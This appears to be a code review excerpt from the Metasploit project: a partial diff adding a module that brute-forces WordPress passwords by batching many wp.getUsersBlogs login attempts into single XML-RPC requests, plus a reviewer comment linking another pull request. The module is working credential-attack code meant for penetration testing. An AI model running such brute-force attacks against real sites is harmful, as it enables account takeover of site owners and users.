modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb

```diff
@@ -0,0 +1,171 @@
+      xml << "<params>\n"
+      xml << " <param><value><array><data>\n"
+      pass_group.each  do |pass|
+
+        xml << "  <value><struct>\n"
+        xml << "  <member>\n"
+        xml << "    <name>methodName</name>\n"
+        xml << "    <value><string>wp.getUsersBlogs</string></value>\n"
+        xml << "  </member>\n"
+        xml << "  <member>\n"
+        xml << "    <name>params</name><value><array><data>\n"
+        xml << "     <value><array><data>\n"
+        xml << "      <value><string>#{user}</string></value>\n"
+        xml << "      <value><string>#{pass}</string></value>\n"
+        xml << "     </data></array></value>\n"
+        xml << "    </data></array></value>\n"
+        xml << "  </member>\n"
+        xml << "  </struct></value>\n"
+
+      end
+      xml << " </data></array></value></param>\n"
+      xml << "</params>\n"
+      xml << "</methodCall>"
+
+      xml_payloads << xml
+    end
+
+    print_status('Generating XMLs just done.')
+    return xml_payloads
+  end
+
+  #
+  # Check target status
+  #
+  def check_wpstatus
+    print_status("Checking #{peer} status!")
+
+    case
+      when !wordpress_and_online?
+        print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running WordPress or you got blocked!")
+        :abort
+      when !wordpress_xmlrpc_enabled?
+        print_error("#{rhost}:#{rport}#{target_uri} does not enable XMLRPC")
+        :abort
+      else
+        print_status("Target #{peer} is running Wordpress")
+    end
+  end
+
+  def parse_response(res)
+
+    resp.scan(/Incorrect username or password/)
+
+  end
+
+  def run
+    check_wpstatus
+
+    usernames.each do |user|
+      passfound = false
+
+      print_status("Bruteforcing user: #{user}")
+      generate_xml(user).each do |xml|
+        break if passfound == true
+
+        opts =
+            {
+                'method'  => 'POST',
+                'uri'     => wordpress_url_xmlrpc,
+                'data'    => xml,
+                'ctype'   =>'text/xml'
+            }
+
+        client = Rex::Proto::Http::Client.new(rhost)
+        client.connect
+        request  = client.request_cgi(opts)
+        response = client.send_recv(request)
+
+        # Request Parser
+        req_xml = Nokogiri::Slop xml
+        # Response Parser
+        res_xml = Nokogiri::Slop response.to_s.scan(/<.*>/).join
+
+        begin
+          res_xml.document.methodResponse.params.param.value.array.data.value.each_with_index do |value, i|
+            begin
+              # If this gives exception then its the correct password
+              value.struct.member[1].value.string.text
+            rescue
+              user = req_xml.document.methodCall.params.param.value.array.data.value[i].struct.member[1].value.array.data.value.array.data.value[0].text
+              pass = req_xml.document.methodCall.params.param.value.array.data.value[i].struct.member[1].value.array.data.value.array.data.value[1].text
```

Comment:
Take a look at https://github.com/rapid7/metasploit-framework/pull/6118 for better XML parsing.